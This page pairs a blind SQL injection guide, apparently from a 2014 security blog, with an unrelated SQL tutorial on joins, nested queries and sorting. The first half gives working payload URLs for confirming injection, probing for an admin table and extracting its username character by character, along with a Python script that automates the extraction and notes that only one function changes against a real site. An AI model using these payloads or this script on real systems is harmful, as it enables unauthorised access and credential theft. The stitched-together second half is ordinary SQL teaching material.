
SQL injection: getting administrator privileges the easy way

火星人 @ 2014-03-09
Checking whether the parameter is injectable
http://127.0.0.1/xx?id=11 and 1=1 (page renders normally)
http://127.0.0.1/xx?id=11 and 1=2 (page is different: empty, broken or an error)
The difference between these two responses is the true/false oracle that every probe below relies on: a condition that holds gives the normal page, one that fails gives the 1=2 page.
Checking for a table (the normal page comes back only if a table named admin exists)
http://127.0.0.1/xx?id=11 and exists (select * from admin)
Checking for a column
http://127.0.0.1/xx?id=11 and exists (select username from admin)
Checking for a row by ID (ID=1 pins the probes below to a single account)
http://127.0.0.1/xx?id=11 and exists (select id from admin where ID=1)
Checking the length of the value (here: the username of the row with ID=1 is 5 characters; try other lengths until the page is normal)
http://127.0.0.1/xx?id=11 and exists (select id from admin where len(username)=5 and ID=1)
Checking whether the backend is MSSQL (sysobjects is a SQL Server system table; on an Access database the query fails and the page is not normal)
http://127.0.0.1/xx?id=11 and exists (select * from sysobjects)
Checking whether the first character is printable ASCII (Access uses asc(mid()), MSSQL uses unicode(substring()); the range 30-130 roughly brackets the printable codes 32-126)
(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 30 and 130 and ID=1)
(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 30 and 130 and ID=1)
Narrowing down the character code (repeat with smaller ranges, halving each time, until only one value is left)
(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1)) between 90 and 100 and ID=1)
(MSSQL database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where unicode(substring(username,1,1)) between 90 and 100 and ID=1)
Confirming the exact character (97 is 'a'; on MSSQL the same probe is written with unicode(substring(username,1,1))=97). Then move on to mid(username,2,1) and repeat for every position up to the length found above; the same loop works against any other column of the table.
(Access database)
http://127.0.0.1/xx?id=11 and exists (select id from admin where asc(mid(username,1,1))=97 and ID=1)
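The probes above, automated, as an added example that is not part of the original post. SQLite stands in for the Access backend: the simulated target pastes the id parameter into its query exactly as a vulnerable page would, and maps the Access functions asc/mid/len used in the post's payloads to SQLite's unicode/substr/length so the payload strings themselves are the ones the post shows. The news table, the admin row and the 32-126 search range are constructed assumptions. Where the post narrows the range by hand, the script bisects it, which pins down one character in about seven requests plus one confirming '=' probe.

```python
import sqlite3

# --- Simulated vulnerable target (constructed for this example) ---------------
# The Access functions in the post's payloads and their SQLite equivalents.
ACCESS_TO_SQLITE = (("asc(mid(", "unicode(substr("), ("len(", "length("))


class SimulatedTarget:
    """An Access-style page that concatenates ?id= straight into its SQL."""

    def __init__(self, admin_username="admin"):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript(
            "create table news(id integer, title text);"
            "insert into news values (11, 'hello');"
            "create table admin(ID integer, username text, password text);"
        )
        self.db.execute("insert into admin values (1, ?, 'secret')", (admin_username,))
        self.requests = 0

    def page_is_normal(self, injected_id):
        """Boolean oracle: True when the id=11 article renders (a row came back)."""
        self.requests += 1
        sql = "select title from news where id=" + injected_id  # the injection point
        for access_fn, sqlite_fn in ACCESS_TO_SQLITE:
            sql = sql.replace(access_fn, sqlite_fn)
        try:
            return self.db.execute(sql).fetchone() is not None
        except sqlite3.Error:
            return False  # an error page is just another "not normal" response


# --- Attacker side: the post's probes, automated ------------------------------
def payload(condition):
    """Same shape as the post's URLs: ?id=11 and exists (select id from admin where <cond> and ID=1)."""
    return f"11 and exists (select id from admin where {condition} and ID=1)"


def is_injectable(oracle):
    # The post's first two checks: 1=1 keeps the page, 1=2 changes it, admin exists.
    return (oracle("11 and 1=1") and not oracle("11 and 1=2")
            and oracle("11 and exists (select * from admin)"))


def find_length(oracle, max_len=32):
    """The post's len(username)=N probe, tried for N = 1..max_len."""
    for n in range(1, max_len + 1):
        if oracle(payload(f"len(username)={n}")):
            return n
    return None


def find_char(oracle, pos, lo=32, hi=126):
    """Bisect printable ASCII with the 'between' probe, then confirm with '='."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(payload(f"asc(mid(username,{pos},1)) between {lo} and {mid}")):
            hi = mid
        else:
            lo = mid + 1
    # The post's final step (97 == 'a'), which also catches values outside the range.
    if oracle(payload(f"asc(mid(username,{pos},1))={lo}")):
        return chr(lo)
    return None  # e.g. a non-ASCII character; widen the range for those


def extract_username(oracle):
    """Full procedure: confirm injection, learn the length, recover each character."""
    if not is_injectable(oracle):
        return None
    n = find_length(oracle)
    if n is None:
        return None
    return "".join(find_char(oracle, i) or "?" for i in range(1, n + 1))


if __name__ == "__main__":
    target = SimulatedTarget("admin")
    print(extract_username(target.page_is_normal), "in", target.requests, "requests")
```

Against a real target, `page_is_normal` is the only part that changes: fetch the URL and compare the body (or its length) with the known 1=1 and 1=2 responses. Everything else, including the payload strings, stays the same.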

Left join: every row of the left-hand table is returned, even those with no matching row on the right (the right-hand columns come back NULL).
In other words, a left outer join returns the inner-join rows plus the left-table rows that have no match in the right table.
b2. Right join
Same as the left join with the roles of the two tables swapped.
b3. Full join
select sno,name,major from students FULL JOIN majors ON students.mno=majors.mno
Rows from both tables are returned, matched where possible and padded with NULLs otherwise.
c. Self join
select c1.cno,c1.coursename,c1.pno,c2.coursename from courses c1,courses c2 where c1.pno=c2.cno
Table aliases (c1, c2) let the same table appear twice in one query.
d. Cross join
select lastname,firstname from lastname CROSS JOIN firstname
Equivalent to the Cartesian product: every row of one table paired with every row of the other.
8. Nested queries
a. With the keyword IN, e.g. to find the students from the same hometown as 豬豬:
select * from students where native in (select native from students where name='豬豬')
b. With the keyword EXISTS; the following two statements are equivalent:
select * from students where sno in (select sno from grades where cno='B2')
select * from students where exists (select * from grades where grades.sno=students.sno AND cno='B2')
9. Sorting with ORDER BY
a. Two directions: ASC (ascending, the default) and DESC (descending).
b. You can sort by any column of the select list, and the column may be given by its position in that list, e.g. (3 means avg(mark)):
select sno,count(*),avg(mark) from grades group by sno having avg(mark)>85 order by 3
10. Other
a. Identifiers containing spaces must be enclosed in [].
b. Rows with no value in a column are found with IS NULL (not = NULL), e.g. select sno,courseno from grades where mark IS NULL
c. In nested queries note the difference between ANY and ALL: ANY is true if the comparison holds for at least one returned value (like ||), ALL only if it holds for every returned value (like &&).
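The join and nested-query statements from sections b-10 run over constructed data, as an added example that is not part of the original tutorial. SQLite stands in for the SQL Server dialect the notes use (it accepts the same [] identifiers); FULL JOIN and ANY/ALL are left out because older SQLite builds lack them. The students/majors/courses/grades rows are made up so that each query has something to show: a student with no major (left join keeps her with a NULL major), courses whose pno points at a prerequisite cno (self join), and a grade row whose mark is NULL (IS NULL, and avg() ignoring it).

```python
import sqlite3


def build_school_db():
    """Constructed sample data for the tutorial's students/majors/courses/grades schema."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table majors(mno text, major text);
        create table students(sno text, name text, mno text, native text);
        create table courses(cno text, coursename text, pno text);
        create table grades(sno text, cno text, mark integer);
        insert into majors values ('M1','CS'), ('M2','Math'), ('M9','Art');
        insert into students values
            ('S1','豬豬','M1','Hunan'), ('S2','Li','M1','Hunan'),
            ('S3','Wang','M2','Hubei'), ('S4','Zhao',NULL,'Hunan');
        insert into courses values
            ('A1','Intro',NULL), ('B2','Databases','A1'), ('C3','Security','B2');
        insert into grades values
            ('S1','A1',90), ('S1','B2',88), ('S2','B2',70),
            ('S3','A1',95), ('S3','B2',NULL), ('S4','A1',80);
    """)
    return db


def run(db, sql):
    return db.execute(sql).fetchall()


def left_join_students(db):
    # S4 has no majors row: LEFT JOIN still returns her, with major = NULL.
    return run(db, "select sno, name, major from students "
                   "left join majors on students.mno = majors.mno order by sno")


def self_join_prerequisites(db):
    # Aliases c1/c2 join courses to itself: c1.pno names the prerequisite course c2.
    return run(db, "select c1.cno, c1.coursename, c2.coursename "
                   "from courses c1, courses c2 where c1.pno = c2.cno order by c1.cno")


def cross_join_size(db):
    # Cartesian product: 4 students x 3 majors.
    return run(db, "select count(*) from students cross join majors")[0][0]


def same_hometown_as(db, name):
    # Section 8a, with IN (parameterised here instead of concatenated).
    return db.execute("select sno from students where native in "
                      "(select native from students where name = ?) order by sno",
                      (name,)).fetchall()


def took_course_in(db, cno):
    return db.execute("select sno from students where sno in "
                      "(select sno from grades where cno = ?) order by sno", (cno,)).fetchall()


def took_course_exists(db, cno):
    # Section 8b: the correlated EXISTS form, equivalent to took_course_in.
    return db.execute("select sno from students where exists (select * from grades "
                      "where grades.sno = students.sno and cno = ?) order by sno",
                      (cno,)).fetchall()


def ungraded(db):
    # Section 10b: IS NULL finds the row whose mark was never filled in.
    return run(db, "select sno, cno from grades where mark is null")


def honour_roll(db):
    # Section 9b: GROUP BY / HAVING, sorted by select-list position 3 = avg(mark).
    # avg() skips the NULL mark, count(*) does not.
    return run(db, "select sno, count(*), avg(mark) from grades "
                   "group by sno having avg(mark) > 85 order by 3")


if __name__ == "__main__":
    db = build_school_db()
    for fn in (left_join_students, self_join_prerequisites, ungraded, honour_roll):
        print(fn.__name__, fn(db))
```

The IN and EXISTS helpers take their value as a bound parameter; written with string concatenation, as in the first half of this page, either one becomes the injection point the post exploits.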



http://coctec.com/docs/security/show-post-59110.html